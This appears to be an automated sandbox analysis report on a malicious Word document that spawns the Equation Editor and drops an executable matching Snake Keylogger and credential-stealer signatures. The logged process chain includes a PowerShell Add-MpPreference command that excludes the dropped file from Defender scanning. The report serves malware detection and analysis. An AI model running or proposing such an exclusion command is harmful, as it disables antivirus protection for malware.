                  Source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000008.00000002.908152550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000005.00000002.414699470.00000000039A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: cmnjgyugo61000.exe PID: 3472, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: cmnjgyugo61000.exe PID: 3576, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: CLLPdgxhnmwGf5Y[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: cmnjgyugo61000.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.cmnjgyugo61000.exe.3cdcb20.5.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, FpO6EurS5foft958ol.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.cmnjgyugo61000.exe.8510000.6.raw.unpack, FpO6EurS5foft958ol.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, gFGLQUQObC5qQ0lCjG.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, gFGLQUQObC5qQ0lCjG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.cmnjgyugo61000.exe.3bd2ae0.2.raw.unpack, gFGLQUQObC5qQ0lCjG.csSecurity API names: _0020.AddAccessRule
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, gFGLQUQObC5qQ0lCjG.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, gFGLQUQObC5qQ0lCjG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, gFGLQUQObC5qQ0lCjG.csSecurity API names: _0020.AddAccessRule
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, FpO6EurS5foft958ol.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.cmnjgyugo61000.exe.8510000.6.raw.unpack, gFGLQUQObC5qQ0lCjG.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 5.2.cmnjgyugo61000.exe.8510000.6.raw.unpack, gFGLQUQObC5qQ0lCjG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.cmnjgyugo61000.exe.8510000.6.raw.unpack, gFGLQUQObC5qQ0lCjG.csSecurity API names: _0020.AddAccessRule
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@9/14@26/8
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$na.docJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeMutant created: NULL
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC503.tmpJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............. ................3.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............. ...............E3.........................s............X...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............. ...............Y3.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............. ...............h3.........................s............X...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............. ...............{3.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............. ................3.........................s............X...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n............... ................3.........................s............X...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............. ................3.........................s............X...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........3.........................s............X....... .......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............. ................3.........................s............X...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............. ................3.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............. ................4.........................s............X...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......4.........................s............X.......$.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............. ...............(4.........................s............X...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............. ...............:4.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............. ...............F4.........................s............X...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............X.......2.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............. ...............d4.........................s............X...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............. ...............v4.........................s....................l.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............. ................4.........................s............X...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P............. ................4.........................s............X...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............. .......4........4.........................s............X...............................Jump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: na.docReversingLabs: Detection: 44%
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe"
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe"
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess created: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe"
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess created: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe"Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
                  Source: na.LNK.0.drLNK file: ..\..\..\..\..\Desktop\na.doc
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: 5.2.cmnjgyugo61000.exe.3c57b00.3.raw.unpack, gFGLQUQObC5qQ0lCjG.cs.Net Code: vUYaIWbHfr System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.cmnjgyugo61000.exe.300000.0.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
